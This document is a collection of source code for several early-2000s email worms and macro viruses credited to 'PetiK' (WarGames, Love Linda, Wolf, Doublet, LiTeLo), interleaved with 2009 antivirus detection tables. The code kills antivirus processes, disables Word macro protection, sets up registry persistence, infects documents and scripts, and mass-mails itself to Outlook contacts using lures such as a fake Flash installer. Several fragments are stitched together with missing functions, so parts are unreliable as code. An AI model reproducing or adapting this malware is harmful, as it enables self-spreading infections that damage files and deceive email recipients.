a-squared 4.0.0.101 2009.05.16 Virus.VBS.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 HTML/Petik
AntiVir 7.9.0.168 2009.05.15 VBS/Petik.Good
Antiy-AVL 2.0.3.1 2009.05.15 Virus/VBS.VBS
Authentium 5.1.2.4 2009.05.16 VBS/Petik.K
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Rophage.A
BitDefender 7.2 2009.05.16 VBS.Petik.A
CAT-QuickHeal 10.00 2009.05.15 VBS/Petik.K
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Macrophage
eSafe 7.0.17.0 2009.05.14 VBS.Petik.a.
eTrust-Vet 31.6.6508 2009.05.16 VBS/Rophage
F-Prot 4.4.4.56 2009.05.16 VBS/Petik.K
F-Secure 8.0.14470.0 2009.05.15 Virus.VBS.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.K
GData 19 2009.05.16 VBS.Petik.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.VBS.Petik
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Virus.VBS.Petik
McAfee 5616 2009.05.15 VBS/Rophage
McAfee+Artemis 5616 2009.05.15 VBS/Rophage
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Petik.Good
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik
NOD32 4080 2009.05.15 VBS/Petik.B
Norman 6.01.05 2009.05.16 VBS/Petik.C
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.A
Panda 10.0.0.14 2009.05.16 HTML/Mage
PCTools 4.4.2.0 2009.05.16 VBS.Acroph.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 VBS.Petik
Sophos 4.41.0 2009.05.16 -
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Prepend
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.B
VBA32 3.12.10.5 2009.05.16 Virus.VBS.Petik
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 VBS.Acroph.A
Additional information
File size: 2226 bytes
MD5...: fee8a8a543264ddb70fa00cfbd10625b
SHA1..: 800f9ec17e06d88ecbe5979289e4f67847770561
/*
Name : I-Worm.WarGames
Author : PetiK
Date : February 12th 2002 - February 22th 2002
Language : C++/Win32asm
*/
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <tlhelp32.h>
#pragma argused
#pragma inline
char filename[100],sysdir[100],copyr[50]="w",winhtm[100],subj[50];
int num,counter=0;
char *alph[]={"a","b","c","d","e","f","g","h","i","j","k","l","m",
"n","o","p","q","r","s","t","u","v","w","x","y","z"};
char dn[20]="Wargames Uninstall",ust[40]="rundll32 mouse,disable";
LPSTR
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell
Folders";
BYTE desktop[50],favoris[50],personal[50],cache[50],page[150];
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),spage=sizeof(page);
DWORD type=REG_SZ;
FILE *vbsworm,*winstart;
HANDLE lSnapshot,myproc;
BOOL rProcessFound;
LHANDLE session;
MapiMessage mess;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];
HINSTANCE hMAPI;
WIN32_FIND_DATA ffile;
PROCESSENTRY32 uProcess;
HKEY hReg;
SYSTEMTIME wartime;
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
// Kill Some AntiVirus
StopAV("AVP32.EXE"); // AVP
StopAV("AVPCC.EXE"); // AVP
StopAV("AVPM.EXE"); // AVP
StopAV("WFINDV32.EXE"); // Dr. Solomon
StopAV("F-AGNT95.EXE"); // F-Secure
StopAV("NAVAPW32.EXE"); // Norton Antivirus
StopAV("NAVW32.EXE"); // Norton Antivirus
StopAV("NMAIN.EXE"); // Norton Antivirus
StopAV("PAVSCHED.EXE"); // Panda AntiVirus
StopAV("ZONEALARM.EXE"); // ZoneAlarm
GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)sysdir,100);
SetCurrentDirectory(sysdir);
CopyFile(filename,"article.doc.exe",TRUE);
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\
\WarGames Worm",&hReg);
RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20);
RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40);
RegCloseKey(hReg);
randomize();
num=rand() % 10;
randname:
strcat(copyr,alph[GetTickCount()%25]);
if(++counter==num) {
strcat(copyr,".exe");
MessageBox(NULL,copyr,"New Copy Name:",MB_OK|MB_ICONINFORMATION);
CopyFile(filename,copyr,FALSE);
WriteProfileString("WINDOWS","RUN",copyr);
WritePrivateProfileString("rename","NUL",filename,"WININIT.INI");
goto endrandname;
}
Sleep(GetTickCount()%100);
goto randname;
endrandname:
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
RegCloseKey(hReg);
GetWindowsDirectory((char *)winhtm,100);
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0
end_all_asm:
}
FindFile(desktop,"*.htm");
FindFile(desktop,"*.doc");
FindFile(favoris,"*.ht*");
FindFile(personal,"*.ht*");
FindFile(personal,"*.doc");
FindFile(personal,"*.xls");
FindFile(personal,"*.asp");
FindFile(cache,".ht*");
FindFile(cache,".php");
FindFile(cache,".asp");
FindFile(winhtm,".ht*");
FindFile(winhtm,".doc");
vbsworm=fopen("wargames.vbs","w");
fprintf(vbsworm,"On Error Resume Next\n");
fprintf(vbsworm,"msgbox %cScripting.FileSystemObject%c\n",34,34);
fprintf(vbsworm,"Set sf=CreateObject(%cScripting.FileSystemObject%c)\n",34,34);
fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n");
fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application%c)\n",34,34);
fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34);
fprintf(vbsworm,"For Each C In MA.AddressLists\n");
fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n");
fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n");
fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n");
fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n");
fprintf(vbsworm,"EM.To=AD.Address\n");
fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c read this.%c\n",34,34,34,34);
fprintf(vbsworm,"body=%cI found this on the web and it is important.%c\n",34,34);
fprintf(vbsworm,"body = body & VbCrLf & %cOpen the attached file and read.%c\n",34,34);
fprintf(vbsworm,"EM.Body=body\n");
fprintf(vbsworm,"EM.Attachments.Add(sys&%c\\article.doc.exe%c)\n",34,34);
fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n");
fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34);
fprintf(vbsworm,"EM.Send\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fclose(vbsworm);
ShellExecute(NULL,"open","wargames.vbs",NULL,NULL,SW_SHOWNORMAL);
Sleep(5000);
DeleteFile("wargames.vbs");
hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIV
E,0);
if(hf==INVALID_HANDLE_VALUE)
return;
size=GetFileSize(hf,NULL);
if(!size)
return;
if(size<8)
return;
size-=100;
hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
if(!hf2) {
CloseHandle(hf);
return;
}
mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
if(!mapped) {
CloseHandle(hf2);
CloseHandle(hf);
return;
}
i=0;
while(i<size && !test) {
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
test=TRUE;
i+=strlen("mailto:");
k=0;
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
if(mapped[i]!=' ') {
mail[k]=mapped[i];
k++;
if(mapped[i]=='@')
valid=TRUE;
}
i++;
}
mail[k]=0;
} else
i++;
}
if(!valid)
mail[0]=0;
UnmapViewOfFile(mapped);
CloseHandle(hf2);
CloseHandle(hf);
return;
}
mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mess.lpRecips)
return;
memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
mess.lpRecips->lpszName=tos;
mess.lpRecips->lpszAddress=tos;
mess.lpRecips->ulRecipClass=MAPI_TO;
mess.nRecipCount=1;
mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mess.lpFiles)
return;
memset(mess.lpFiles,0,sizeof(MapiFileDesc));
mess.lpFiles->lpszPathName=filename;
mess.lpFiles->lpszFileName="patch.exe";
mess.nFileCount=1;
mess.lpOriginator=&from;
mSendMail(0,0,&mess,0,0);
free(mess.lpRecips);
free(mess.lpFiles);
}
Additional information
File size: 77824 bytes
MD5...: f3f60781ccd4c9c429a1431f0162a295
SHA1..: d6ff0b428178a9898f1552a0d18e59b48686cb67
<html><head><title>Love Linda</title>
<body bgColor=blue onLoad="window.status='I LOVE YOU Linda'">
<font face='verdana' color=yellow size='3'>For Linda...<br>
<br>Because I Love You.
<br>I code this.<br>I can't say what I feel for you.
<br>You will know by this way.<br></font>
<SCRIPT Language=VBScript>
On Error Resume Next
msgbox "Please accept the ActiveX",vbinformation,"Info"
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
If err.number=429 then
ws.Run javascript:location.reload()
Else
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set linda = fso.CreateTextFile(win&"\LoveLinda.htm", 2)
Set love = document.body.createTextRange
linda.WriteLine "<html><head><title>Love Linda</title>"
linda.WriteLine "<body bgColor=blue>"
linda.WriteLine love.htmltext
linda.WriteLine "</body></html>"
linda.Close
pers=ws.RegRead
("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Personal")
create(win)
create(sys)
create(pers)
cv="HKLM\Software\Microsoft\Windows\CurrentVersion"
ws.RegWrite cv&"\RegisteredOwner","Linda"
ws.RegWrite cv&"\RegisteredOrganization","Love Linda"
ws.RegWrite cv&"\Run\LoveLinda",sys&"\lindamail.vbs"
Set mail=fso.CreateTextFile(sys&"\lindamail.vbs", 2)
mail.WriteLine "On Error Resume Next"
mail.WriteLine "Set out=CreateObject(""Outlook.Application"")"
mail.WriteLine "Set B=out.GetNameSpace(""MAPI"")"
mail.WriteLine "For Each C In B.AddressLists"
mail.WriteLine "If C.AddressEntries.Count <> 0 Then"
mail.WriteLine "For D=1 To C.AddressEntries.count"
mail.WriteLine "Set em=C.AddressEntries(D)"
mail.WriteLine "Set lm=out.CreateItem(0)"
mail.WriteLine "lm.To=em.Address"
mail.WriteLine "lm.Subject=""Love Message..."""
mail.WriteLine "lm.Body=""Read this beautiful love message."""
mail.WriteLine "lm.Attachments.Add(""" &win& "\LoveLinda.htm"")"
mail.WriteLine "lm.DeleteAfterSubmit=True"
mail.WriteLine "If lm.To <> """" Then"
mail.WriteLine "F.Send"
mail.WriteLine "End If"
mail.WriteLine "Next"
mail.WriteLine "End If"
mail.WriteLine "Next"
End If
Function create(doss)
Set FolderObj = fso.GetFolder(doss)
Set FO = FolderObj.Files
For each file in FO
ext = lcase(fso.GetExtensionName(file.Name))
if ext="ini" or ext="txt" or ext="bmp" or ext="doc" or ext="xls" or ext="mp3"
or ext="hlp" or ext="inf" Then
Set linda = fso.CreateTextFile(file.path&".htm", 2)
Set love = document.body.createTextRange
linda.WriteLine "<html><head><title>Love Linda</title>"
linda.WriteLine "<body bgColor=blue>"
linda.WriteLine love.htmltext
linda.WriteLine "</body></html>"
linda.Close
end if
next
End Function
</script></body></html>
File Linda.htm received on 05.16.2009 17:51:29 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Bubbleboy!IK
AhnLab-V3 5.0.0.2 2009.05.16 HTML/Petik
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.04
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 JS/Mailer.A
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.CC1D1675
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik
DrWeb 5.0.0.12182 2009.05.16 WORM.Virus
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Nilda
F-Prot 4.4.4.56 2009.05.16 JS/Mailer.A
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 JS/Mailer.A
GData 19 2009.05.16 Generic.ScriptWorm.CC1D1675
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Bubbleboy
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 VBS/Generic@MM
McAfee+Artemis 5616 2009.05.15 VBS/Generic@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.04
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 HTML/Worm.gen
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.K
Panda 10.0.0.14 2009.05.16 Worm Generic
PCTools 4.4.2.0 2009.05.16 VBS.Lovlind.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 VBS/Petik-N
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 HTML_LINDA.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik
ViRobot 2009.5.15.1737 2009.05.15 VBS.Worm-Family
VirusBuster 4.6.5.0 2009.05.16 VBS.Lovlind.A
Additional information
File size: 2755 bytes
MD5...: 43ac95142a5c7281246b68ef0584e079
SHA1..: 66758177710fcdd652c37671efe593f7651248e2
' Name : W97M.Wolf
' Author : PetiK
' Language : VBA Word
' Date : 25/02/2002
Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
MsgBox "Very Thanx to Tex Avery. hahahahaha", vbInformation, "W97M.Wolf.A"
Application.UserName = "My Name is Wolf"
End Sub
Sub AutoClose()
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Wolf"
.Title = "My Friend the Wolf"
.Subject = "Tex Avery and the other"
.Keywords = "Wolf, Tex Avery, Ed Love, Droopy"
.Comments = "No comments"
.Execute
End With
If Left(ActiveDocument.Name, 8) <> "Document" And ActiveDocument.Saved = False Then
ActiveDocument.Save
End If
End Sub
Sub Infection()
On Error Resume Next
Set Nor = NormalTemplate.VBProject.VBComponents
Set Doc = ActiveDocument.VBProject.VBComponents
DropFile = "C:\Wolf.sys"
If Nor.Item("Wolf").Name <> "Wolf" Then
Doc("Wolf").Export DropFile
Nor.Import DropFile
End If
If Doc.Item("Wolf").Name <> "Wolf" Then
Nor("Wolf").Export DropFile
Doc.Import DropFile
ActiveDocument.Save
End If
End Sub
Sub SearchF()
With Application.FileSearch
.FileName = "*.doc"
.LookIn = "C:\"
.SearchSubFolders = False
.FileType = msoFileTypeWordDocuments
.Execute
For I = 1 To .FoundFiles.Count
FileSystem.SetAttr .FoundFiles(I), vbNormal
Next I
End With
End Sub
Sub EndProtect()
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
Case "9.0"
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End Select
WordBasic.DisableAutoMacros 0
End Sub
Sub Payload()
MyApp = Shell("notepad.exe", 1)
SendKeys "This is my last Word97Macro virus.", True
AppActivate (MyApp)
End Sub
File Wolf.doc received on 05.11.2009 21:18:10 (CET)
Additional information
File size: 40960 bytes
MD5...: 456d71a02c519c6a1f13fa9ffc899f2e
SHA1..: 534f5ae68f8634c6c69a5b40ad131a4bf674d000
' Name : VBS/W97M.Doublet
' Author : PetiK
' Language : VBS
' Date : 02/03/2002
personal=ws.SpecialFolders("MyDocuments")
sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\Doublet.vbs")
Set vw=sf.CreateTextFile("C:\Doublet.sys")
vw.WriteLine "Attribute VB_Name = ""Doublet"""
vw.WriteLine "Sub AutoOpen()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Call FuckProtect"
vw.WriteLine "Call Infect"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub HelpAbout()"
vw.WriteLine "If Day(Now) = 10 Then"
vw.WriteLine "MsgBox ""W97M/VBS.Doublet. Hahahahaha"", vbInformation, ""For "" +
Application.UserName"
vw.WriteLine "End If"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub Infect()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Set Nor = NormalTemplate.VBProject.VBComponents"
vw.WriteLine "Set Doc = ActiveDocument.VBProject.VBComponents"
vw.WriteLine "Drop = ""C:\Doublet.sys"""
vw.WriteLine "If Nor.Item(""Doublet"").Name <> ""Doublet"" Then"
vw.WriteLine " Doc(""Doublet"").Export Drop"
vw.WriteLine " Nor.Import Drop"
vw.WriteLine "End If"
vw.WriteLine "If Doc.Item(""Doublet"").Name <> ""Doublet"" Then"
vw.WriteLine " Nor(""Doublet"").Export Drop"
vw.WriteLine " Doc.Import Drop"
vw.WriteLine " ActiveDocument.Save"
vw.WriteLine "End If"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub FuckProtect()"
vw.WriteLine "With Options"
vw.WriteLine " .ConfirmConversions = False"
vw.WriteLine " .VirusProtection = False"
vw.WriteLine " .SaveNormalPrompt = False"
vw.WriteLine "End With"
vw.WriteLine "Select Case Application.Version"
vw.WriteLine "Case ""10.0"""
vw.WriteLine " System.PrivateProfileString("""",
""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine " System.PrivateProfileString("""",
""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""AccessVBOM"") = 1&"
vw.WriteLine "Case ""9.0"""
vw.WriteLine " System.PrivateProfileString("""",
""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine "End Select"
vw.WriteLine "WordBasic.DisableAutoMacros 0"
vw.WriteLine "End Sub"
vw.Close
lecteur()
ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM", 1,
"REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
Set out=CreateObject("Outlook.Application")
Set MA=out.GetNameSpace("MAPI")
For Each C In MA.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
tmpname=""
randomize(timer)
namel=int(rnd(1)*20)+1
For lettre = 1 To namel
randomize(timer)
tmpname=tmpname & chr(int(rnd(1)*26)+97)
Next
typext = "execombatbmpjpggifdocxlsppthtmhtthta"
randomize(timer)
tmpext = int(rnd(1)*11)+1
tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"
sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\"&tmpname)
subject="Re: " & left(tmpname,len(tmpname)-4) & " for you."
Set AD=C.AddressEntries(D)
Set mail=out.CreateItem(0)
mail.To=AD.Address
mail.Subject=subject
body="Hi " & AD.Name & ","
body = body & VbCrLf & "Look at this attached found on the net."
body = body & VbCrLf & ""
body = body & VbCrLf & " See you soon"
mail.Body=body
mail.Attachments.Add(sf.GetSpecialFolder(0)&"\"&tmpname)
mail.DeleteAfterSubmit=True
If mail.To <> "" Then
mail.Send
sf.DeleteFile sf.GetSpecialFolder(0)&"\"&tmpname
End If
Next
End If
Next
Set wrd=WScript.CreateObject("Word.Application")
If wrd Is Nothing Then WScript.Quit
wrd.Visible=False
Set srch = wrd.Application.FileSearch
srch.Lookin = ""&personal&"": srch.SearchSubFolders = True: srch.FileName="*.doc":
srch.Execute
For f = 1 To srch.FoundFiles.Count
victim = srch.FoundFiles(f)
wrd.Documents.Open victim
Set Doc=wrd.ActiveDocument.VBProject.VBComponents
If Doc.Item("Doublet").Name <> "Doublet" Then
Doc.Import ("C:\Doublet.sys")
wrd.ActiveDocument.Save
End If
wrd.ActiveDocument.Close
Next
wrd.Application.Quit
Sub lecteur()
On Error Resume Next
dim f,f1,fc
Set dr = sf.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
liste(d.path&"\")
End If
Next
End Sub
Sub infecte(dossier)
On Error Resume Next
Set sf=CreateObject("Scripting.FileSystemObject")
Set f = sf.GetFolder(dossier)
Set fc = f.Files
For Each f1 in fc
ext = sf.GetExtensionName(f1.path)
ext = lcase(ext)
if (ext="vbs") or (ext="vbe") Then
Set cot=sf.OpenTextFile(f1.path, 1, False)
If cot.ReadLine <> "'VBS/W97M.Doublet" then
cot.Close
Set cot=sf.OpenTextFile(f1.path, 1, False)
vbsorg=cot.ReadAll()
cot.Close
Set inf=sf.OpenTextFile(f1.path,2,True)
inf.WriteLine "'VBS/W97M.Doublet"
inf.Write(vbsorg)
inf.WriteLine ""
inf.WriteLine virus
inf.Close
End If
End If
Next
End Sub
Sub liste(dossier)
On Error Resume Next
Set f = sf.GetFolder(dossier)
Set sf = f.SubFolders
For Each f1 in sf
infecte(f1.path)
liste(f1.path)
Next
End Sub
File Doublet.vbs received on 05.16.2009 11:30:45 (CET)
Additional information
File size: 5258 bytes
MD5...: bdd4e8ab9db0d5e79474cb50f1f0ebda
SHA1..: 303d4183f401e9bf707dab9d05d993e329f71753
/*
Name : I-Worm.LiTeLo
Author : PetiK
Date : March 7th 2002 - March 10th 2002
Language : C++/HTML
*/
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#pragma argused
char filename[50],copysys[50],copyreg[50],htmf[50],fakemess[1024];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
Uninst="Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\LiteLo";
char dn[20]="Flash32 Uninstall",ust[40];
BYTE htmail[10];
DWORD Tmp,type=REG_SZ,shtmail=sizeof(htmail);
LPTSTR cmdLine,ptr;
BOOL installed,uninstall;
HMODULE kernel32;
FILE *htm;
LHANDLE session;
MapiMessage *mess;
HINSTANCE WiNet,hMAPI;
char messId[512],mname[50],maddr[30];
char *attname[]={"flash32.exe","flsh32eng.exe","flsh32fr.exe","new_flash.exe",
"freeflash32.exe","installflash.exe","setupflash.exe"};
HKEY hReg;
SYSTEMTIME systime;
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
kernel32=GetModuleHandle("KERNEL32.DLL");
if(kernel32) {
(FARPROC &)RegSerPro=GetProcAddress(kernel32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
}
GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)copysys,100);
strcpy(htmf,copysys);
strcat(copysys,"\\Flash32.exe");
strcat(htmf,"\\FlashNet.htm");
installed=FALSE;
uninstall=FALSE;
cmdLine=GetCommandLine();
if(cmdLine) {
for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
if(ptr[0]=='-' && ptr[1]!=0) {
switch(ptr[1]) {
default:
break;
case 'i':
installed=TRUE;
break;
case 'u':
installed=TRUE;
uninstall=TRUE;
break;
}
}
}
if(!installed) {
CopyFile(filename,copysys,FALSE);
strcpy(copyreg,copysys);
strcat(copyreg," -i");
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Flash32",0,REG_SZ,(BYTE *)copyreg,100);
RegCloseKey(hReg);
strcpy(ust,copysys);
strcat(ust," -u");
RegCreateKey(HKEY_LOCAL_MACHINE,Uninst,&hReg);
RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20);
RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40);
RegCloseKey(hReg);
htm=fopen(htmf,"w");
fprintf(htm,"%s",htmms);
fclose(htm);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall"
,0,KEY_ALL_ACCESS,&hReg);
RegDeleteKey(hReg,"LiteLo");
RegCloseKey(hReg);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft",0,KEY_ALL_ACCESS,&hReg);
RegDeleteValue(hReg,"HTMail");
RegCloseKey(hReg);
DeleteFile(htmf);
WritePrivateProfileString("rename","NUL",copysys,"WININIT.INI");
MessageBox(NULL,"Please restart the system.","Uninstall Flash32",MB_OK|
MB_ICONHAND);
ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0);
ExitProcess(0);
}
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft",0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"HTMail",0,&type,htmail,&shtmail);
RegCloseKey(hReg);
if(strcmp(htmail,"OK")!=0) {
ShellExecute(NULL,"open",htmf,NULL,NULL,SW_SHOWMAXIMIZED);
}
cworm:
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|
MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) {
strcpy(mname,mess->lpOriginator->lpszName);
strcpy(maddr,mess->lpOriginator->lpszAddress);
mess->ulReserved=0;
mess->lpszSubject="New! New! Version of Flash";
mess->lpszNoteText="Hi,\nLook at this demo version of Flash.\n\nIt's easy and
free.";
mess->lpszMessageType=NULL;
mess->lpszDateReceived=NULL;
mess->lpszConversationID=NULL;
mess->flFlags=MAPI_SENT;
mess->lpOriginator->ulReserved=0;
mess->lpOriginator->ulRecipClass=MAPI_ORIG;
mess->lpOriginator->lpszName=mess->lpRecips->lpszName;
mess->lpOriginator->lpszAddress=mess->lpRecips->lpszAddress;
mess->nRecipCount=1;
mess->lpRecips->ulReserved=0;
mess->lpRecips->ulRecipClass=MAPI_TO;
mess->lpRecips->lpszName=mname;
mess->lpRecips->lpszAddress=maddr;
mess->nFileCount=1;
mess->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mess->lpFiles, 0, sizeof(MapiFileDesc));
mess->lpFiles->ulReserved=0;
mess->lpFiles->flFlags=NULL;
mess->lpFiles->nPosition=-1;
mess->lpFiles->lpszPathName=filename;
mess->lpFiles->lpszFileName=attname[GetTickCount()&6];
mess->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mess, NULL, NULL);
}
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mess->lpFiles);
mFreeBuffer(mess);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}
}
